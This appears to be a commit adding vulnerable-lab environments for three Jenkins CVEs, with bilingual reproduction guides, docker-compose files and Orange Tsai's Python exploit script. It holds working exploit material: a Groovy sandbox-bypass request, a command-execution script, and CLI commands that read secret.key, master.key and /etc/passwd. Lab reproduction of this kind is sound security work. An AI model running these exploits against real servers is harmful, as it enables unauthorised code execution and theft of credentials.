first commit

jenkins/CVE-2017-1000353/README.md

@@ -0,0 +1,56 @@
+# Jenkins Remote Code Execution (CVE-2017-1000353)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Jenkins is a popular open-source automation server.
+
+Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism.
+
+References:
+
+- <https://www.jenkins.io/security/advisory/2017-04-26/>
+- <https://www.exploit-db.com/exploits/41965>
+
+## Environment Setup
+
+Execute the following command to start Jenkins 2.46.1:
+
+```
+docker compose up -d
+```
+
+After the server is fully started, visit `http://your-ip:8080` to access Jenkins. No manual installation is required.
+
+## Vulnerability Reproduction
+
+The exploitation process involves two steps: generating a malicious serialized payload and sending it to the target Jenkins server.
+
+First, download the [CVE-2017-1000353-1.1-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar) tool to generate the payload. This tool will create a serialized object containing our command:
+
+```bash
+java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
+# jenkins_poc.ser is the output file name
+# "touch ..." is the command to be executed
+```
+
+**Note**: The Java version used for payload generation is crucial. OpenJDK 8u292 is recommended, as other Java versions might not generate a working payload. If you encounter issues, you can use the following command to generate the payload using Docker:
+
+```bash
+docker run --rm -v $(pwd):/tmp openjdk:8u292 bash -c "cd /tmp && java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser \"touch /tmp/success\""
+```
+
+After execution, a file named `jenkins_poc.ser` will be generated containing the serialized payload.
+
+Next, download the [exploit.py](https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py) script and execute it with Python 3 to send the payload:
+
+```bash
+python exploit.py http://your-ip:8080 jenkins_poc.ser
+```
+
+![Sending the exploit payload](1.png)
+
+To verify the successful exploitation, check inside the container for the created file:
+
+![Verification of command execution](2.png)
+
+The presence of `/tmp/success` file confirms that the remote code execution was successful.

jenkins/CVE-2017-1000353/README.zh-cn.md

@@ -0,0 +1,54 @@
+# Jenkins-CI 远程代码执行漏洞（CVE-2017-1000353）
+
+Jenkins 是一个广泛使用的开源自动化服务器。
+
+Jenkins 2.56 及更早版本以及 2.46.1 LTS 及更早版本存在未授权的远程代码执行漏洞。这个未经身份验证的远程代码执行漏洞允许攻击者向 Jenkins CLI 传输序列化的 Java `SignedObject` 对象，该对象会使用新的 `ObjectInputStream` 进行反序列化，从而绕过现有的基于黑名单的保护机制。
+
+参考链接：
+
+- <https://www.jenkins.io/security/advisory/2017-04-26/>
+- <https://www.exploit-db.com/exploits/41965>
+
+## 环境搭建
+
+执行如下命令启动 Jenkins 2.46.1：
+
+```
+docker compose up -d
+```
+
+等待服务器完全启动后，访问 `http://your-ip:8080` 即可看到 Jenkins 已成功运行，无需手动安装。
+
+## 漏洞复现
+
+漏洞利用过程分为两个步骤：生成恶意序列化载荷，并将其发送至目标 Jenkins 服务器。
+
+首先，下载 [CVE-2017-1000353-1.1-SNAPSHOT-all.jar](https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar) 工具来生成 payload。这个工具将创建一个包含我们命令的序列化对象：
+
+```bash
+java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"
+# jenkins_poc.ser 是生成的输出文件名
+# "touch ..." 是要执行的命令
+```
+
+**注意**：生成payload时的Java版本很重要，建议使用OpenJDK 8u292版本。其他版本的Java可能导致生成的payload无法成功利用。如果遇到问题，可以使用以下命令在Docker中生成payload：
+
+```bash
+docker run --rm -v $(pwd):/tmp openjdk:8u292 bash -c "cd /tmp && java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser \"touch /tmp/success\""
+```
+
+执行上述命令后，将生成一个名为 `jenkins_poc.ser` 的文件，其中包含序列化后的 payload。
+
+接下来，下载 [exploit.py](https://github.com/vulhub/CVE-2017-1000353/blob/master/exploit.py) 脚本，并使用 Python 3 执行以发送 payload：
+
+```bash
+python exploit.py http://your-ip:8080 jenkins_poc.ser
+```
+
+![发送漏洞利用载荷](1.png)
+
+要验证漏洞利用是否成功，请检查容器内是否创建了指定文件：
+
+![命令执行验证](2.png)
+
+`/tmp/success` 文件的存在证实了远程代码执行成功。

jenkins/CVE-2017-1000353/docker-compose.yml

@@ -0,0 +1,7 @@
+services:
+  jenkins:
+    image: vulhub/jenkins:2.46.1
+    init: true
+    ports:
+      - "50000:50000"
+      - "8080:8080"

jenkins/CVE-2018-1000861/README.md

@@ -0,0 +1,45 @@
+# Jenkins Remote Code Execution (CVE-2018-1000861)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Jenkins is a popular open-source automation server.
+
+A code execution vulnerability exists in the Stapler web framework used by Jenkins 2.153 and earlier, LTS 2.138.3 and earlier. In `stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java`, attackers can invoke some methods on Java objects by accessing crafted URLs that were not intended to be invoked this way.
+
+Through this vulnerability, multiple exploit chains can be discovered. The most severe one allows unauthenticated users to execute arbitrary commands by bypassing the Groovy sandbox: Before Jenkins executes Groovy scripts in the sandbox, it first checks for syntax errors. This checking process occurs outside the sandbox, allowing attackers to execute arbitrary commands through Meta-Programming during this validation step.
+
+References:
+
+- http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
+- http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
+- https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html
+
+## Environment Setup
+
+Execute the following command to start Jenkins 2.138 with the vulnerable plugins pre-installed:
+
+```
+docker compose up -d
+```
+
+After the server is fully started, visit `http://your-ip:8080` to access Jenkins. No manual installation is required.
+
+## Vulnerability Reproduction
+
+Using @orangetw's [one-click POC script](https://github.com/orangetw/awesome-jenkins-rce-2019), you can execute commands by sending the following request:
+
+```
+http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
+?sandbox=true
+&value=public class x {
+  public x(){
+    "touch /tmp/success".execute()
+  }
+}
+```
+
+![Sending the exploit request](2.png)
+
+The successful creation of `/tmp/success` confirms the remote code execution:
+
+![Verification of command execution](3.png)

jenkins/CVE-2018-1000861/README.zh-cn.md

@@ -0,0 +1,43 @@
+# Jenkins 远程代码执行漏洞（CVE-2018-1000861）
+
+Jenkins 是一个广泛使用的开源自动化服务器。
+
+Jenkins 2.153 及更早版本，LTS 2.138.3 及更早版本存在未授权的远程代码执行漏洞。在 `stapler/core/src/main/java/org/kohsuke/stapler/MetaClass.java` 中，攻击者可以通过访问构造的 URL 路径来调用 Java 对象上的某些方法，而这些路径原本并不是设计用来这样调用的。
+
+在这个漏洞中，可以发现多个可利用的攻击链。其中最严重的是通过绕过 Groovy 沙盒导致未授权用户可执行任意命令：Jenkins 在沙盒中执行 Groovy 脚本之前会先检查语法错误，这个检查过程是在沙盒之外进行的，攻击者可以通过元编程（Meta-Programming）的方式在这个验证步骤中执行任意命令。
+
+参考链接：
+
+- http://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html
+- http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html
+- https://0xdf.gitlab.io/2019/02/27/playing-with-jenkins-rce-vulnerability.html
+
+## 环境搭建
+
+执行如下命令启动 Jenkins 2.138，相关的漏洞插件已预先安装：
+
+```
+docker compose up -d
+```
+
+等待服务器完全启动后，访问 `http://your-ip:8080` 即可看到 Jenkins 已成功运行，无需进行任何手动安装。
+
+## 漏洞复现
+
+使用 @orangetw 提供的[一键化 POC 脚本](https://github.com/orangetw/awesome-jenkins-rce-2019)，发送如下请求即可执行命令：
+
+```
+http://your-ip:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
+?sandbox=true
+&value=public class x {
+  public x(){
+    "touch /tmp/success".execute()
+  }
+}
+```
+
+![发送漏洞利用请求](2.png)
+
+`/tmp/success` 文件的成功创建证实了远程代码执行漏洞的存在：
+
+![命令执行验证](3.png)

jenkins/CVE-2018-1000861/docker-compose.yml

@@ -0,0 +1,7 @@
+services:
+  jenkins:
+    image: vulhub/jenkins:2.138
+    ports:
+      - "50000:50000"
+      - "8080:8080"
+    init: true

jenkins/CVE-2018-1000861/poc.py

@@ -0,0 +1,112 @@
+#!/usr/bin/python
+# coding: UTF-8
+# author: Orange Tsai(@orange_8361)
+# 
+
+import sys
+import requests
+from enum import Enum
+
+# remove bad SSL warnings
+try:
+    requests.packages.urllib3.disable_warnings()
+except:
+    pass
+
+
+endpoint = 'descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript'
+
+class mode(Enum):
+    ACL_PATCHED = 0
+    NOT_JENKINS = 1
+    READ_ENABLE = 2
+    READ_BYPASS = 3
+    ENTRY_NOTFOUND = 999
+
+def usage():
+    print '''
+  Usage:
+    python exp.py <url> <cmd>
+    '''
+
+def _log(msg, fail=False):
+    nb = '[*]'
+    if fail:
+        nb = '[-]'
+    print '%s %s' % (nb, msg)
+
+def _get(url, params=None):
+    r = requests.get(url, verify=False, params=params)
+    return r.status_code, r.content
+
+def _add_bypass(url):
+    return url + 'securityRealm/user/admin/'
+
+def check(url):
+    flag, accessible = mode.ACL_PATCHED, False
+
+    # check ANONYMOUS_READ
+    status, content = _get(url)
+    if status == 200 and 'adjuncts' in content:
+        flag, accessible = mode.READ_ENABLE, True
+        _log('ANONYMOUS_READ enable!')
+    elif status == 403:
+        _log('ANONYMOUS_READ disable!')
+
+        # check ACL bypass, CVE-2018-1000861
+        status, content = _get(_add_bypass(url))
+        if status == 200 and 'adjuncts' in content:
+            flag, accessible = mode.READ_BYPASS, True
+    else:
+        flag = mode.NOT_JENKINS
+
+    # check entry point, CVE-2019-1003005
+    if accessible:
+        if flag is mode.READ_BYPASS:
+            url = _add_bypass(url)
+        status, content = _get(url + endpoint)
+
+        if status == 404:
+            flag = mode.ENTRY_NOTFOUND
+
+    return flag
+
+def exploit(url, cmd):
+    payload = 'public class x{public x(){new String("%s".decodeHex()).execute()}}' % cmd.encode('hex')
+    params = {
+        'sandbox': True, 
+        'value': payload
+    }
+
+    status, content = _get(url + endpoint, params)
+    if status == 200:
+        _log('Exploit success!(it should be :P)')
+    elif status == 405:
+        _log('It seems Jenkins has patched the RCE gadget :(')
+    else:
+        _log('Exploit fail with HTTP status [%d]' % status, fail=True)
+        if 'stack trace' in content:
+            for _ in content.splitlines():
+                if _.startswith('Caused:'):
+                    _log(_, fail=True)
+
+if __name__ == '__main__':
+    if len(sys.argv) != 3:
+        usage()
+        exit()
+
+    url = sys.argv[1].rstrip('/') + '/'
+    cmd = sys.argv[2]
+
+    flag = check(url)
+    if flag is mode.ACL_PATCHED:
+        _log('It seems Jenkins is up-to-date(>2.137) :(', fail=True)
+    elif flag is mode.NOT_JENKINS:
+        _log('Is this Jenkins?', fail=True)
+    elif flag is mode.READ_ENABLE:
+        exploit(url, cmd)
+    elif flag is mode.READ_BYPASS:
+        _log('Bypass with CVE-2018-1000861!')
+        exploit(_add_bypass(url), cmd)
+    else:
+        _log('The `checkScript` is not found, please try other entries(see refs)', fail=True)

jenkins/CVE-2024-23897/README.md

@@ -0,0 +1,58 @@
+# Jenkins Arbitrary File Read Through the CLI (CVE-2024-23897)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Jenkins is an open source automation server.
+
+Jenkins uses the [args4j library](https://github.com/kohsuke/args4j) to parse command arguments and options on the Jenkins controller when processing CLI commands. This command parser has a feature that replaces an `@` character followed by a file path in an argument with the file’s contents (expandAtFiles), which leads attackers to read arbitrary files from Jenkins server.
+
+This vulnerability affects Jenkins prior to 2.441.
+
+References:
+
+- <https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314>
+- <https://mp.weixin.qq.com/s/2a4NXRkrXBDhcL9gZ3XQyw>
+
+## Vulnerable Environment
+
+Execute following command to start a Jenkins server 2.441:
+
+```
+docker compose up -d
+```
+
+You can access the Jenkins server through `http://your-ip:8080/` after the server is started. Default administrator's username and password are `admin` and `vulhub`.
+
+## Exploit
+
+First, you should download the command-line client `jenkins-cli.jar` by `http://localhost:8080/jnlpJars/jenkins-cli.jar`.
+
+Read the file `/proc/self/environ` to get the Jenkins base directory, `JENKINS_HOME=/var/jenkins_home`:
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/proc/self/environ"
+```
+
+![](1.png)
+
+Then, you can use it to retrieve sensitive files such as `secrets.key` or `master.key` (anonymously, only the first line of the file can be read via an error on the command line):
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/var/jenkins_home/secret.key"
+```
+
+![](2.png)
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/var/jenkins_home/secrets/master.key"
+```
+
+![](3.png)
+
+Because the "Allow anonymous read access" is turned on, you can also read the full content of a file:
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http connect-node "@/etc/passwd"
+```
+
+![](4.png)

jenkins/CVE-2024-23897/README.zh-cn.md

@@ -0,0 +1,56 @@
+# Jenkins CLI 接口任意文件读取漏洞（CVE-2024-23897）
+
+Jenkins是一个开源的自动化服务器。
+
+Jenkins使用[args4j](https://github.com/kohsuke/args4j)来解析命令行输入，并支持通过HTTP、Websocket等协议远程传入命令行参数。args4j中用户可以通过`@`字符来加载任意文件，这导致攻击者可以通过该特性来读取服务器上的任意文件。
+
+该漏洞影响Jenkins 2.441及以前的版本。
+
+参考链接：
+
+- <https://www.jenkins.io/security/advisory/2024-01-24/#SECURITY-3314>
+- <https://mp.weixin.qq.com/s/2a4NXRkrXBDhcL9gZ3XQyw>
+
+## 漏洞环境
+
+执行如下命令启动一个Jenkins server 2.441：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080/`即可查看到Jenkins登录页面，默认的管理员帐号密码为`admin`和`vulhub`。
+
+## 漏洞复现
+
+利用该漏洞可以直接使用官方提供的命令行客户端，在`http://localhost:8080/jnlpJars/jenkins-cli.jar`下载。
+
+使用该工具读取目标服务器的`/proc/self/environ`文件，可以找到Jenkins的基础目录，`JENKINS_HOME=/var/jenkins_home`：
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/proc/self/environ"
+```
+
+![](1.png)
+
+然后，可在该目录下读取敏感文件，如`secrets.key` or `master.key`（匿名情况下，只能通过命令行的报错读取文件的第一行）：
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/var/jenkins_home/secret.key"
+```
+
+![](2.png)
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http help 1 "@/var/jenkins_home/secrets/master.key"
+```
+
+![](3.png)
+
+因为开启了“匿名用户可读”选项，你也可以直接使用`connect-node`命令读取完整文件内容：
+
+```
+java -jar jenkins-cli.jar -s http://localhost:8080/ -http connect-node "@/etc/passwd"
+```
+
+![](4.png)

jenkins/CVE-2024-23897/docker-compose.yml

@@ -0,0 +1,11 @@
+version: '2.2'
+services:
+  jenkins:
+    image: vulhub/jenkins:2.441
+    ports:
+      - "50000:50000"
+      - "8080:8080"
+      - "5005:5005"
+    init: true
+    environment:
+      - DEBUG=1